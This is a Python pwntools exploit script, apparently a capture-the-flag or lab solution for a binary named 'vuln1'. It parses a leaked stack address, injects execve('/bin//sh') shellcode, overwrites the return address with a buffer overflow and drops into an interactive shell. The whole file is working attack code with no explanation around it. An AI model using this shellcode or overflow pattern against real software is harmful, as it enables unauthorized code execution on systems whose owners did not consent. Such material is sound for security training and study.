solve1.py

#!/usr/bin/env python3

# pylint: skip-file

from pwn import *

NAME = 'vuln1'
context.binary = ELF(NAME)

# execve(path='/bin//sh', argv=['sh'], envp=0)
SHELLCODE = """
    push 0x68
    mov rax, 0x732f2f2f6e69622f
    push rax
    mov rdi, rsp
    /* push argument array ['sh\x00'] */
    /* push b'sh\x00' */
    push 0x1010101 ^ 0x6873
    xor dword ptr [rsp], 0x1010101
    xor esi, esi /* 0 */
    push rsi /* null terminate */
    push 8
    pop rsi
    add rsi, rsp
    push rsi /* 'sh\x00' */
    mov rsi, rsp
    xor edx, edx /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall
"""

def main():

    p = process(context.binary.path)

    # Read program banner, parse the free info.
    p.readline()
    name_line = p.readline()
    name_addr = name_line.split(b'0x')[1].decode('utf-8').strip().zfill(16)
    name_addr = u64(unhex(name_addr), endianness='big')
    fn_addr = p.readline()

    log.warning(f'&name: {name_addr:016x}')

    # Set initial name.
    p.recvuntil('> ')
    p.sendline('andreas')

    # Send shellcode and overwrite the return address with the address of the
    # stack buffer.
    p.sendline('update')

    shellcode = asm(SHELLCODE)
    padding = b'A' * (0x58 - len(shellcode))
    payload = (
        shellcode
        + padding
        + p64(name_addr)
    )
    log.info('sending payload:')
    log.info(hexdump(payload))
    p.send(payload)
    p.recvuntil('> ')

    # Return from function.
    p.sendline('exit')

    log.warning('Enjoy your shell!')
    p.interactive()


if __name__ == '__main__':
    main()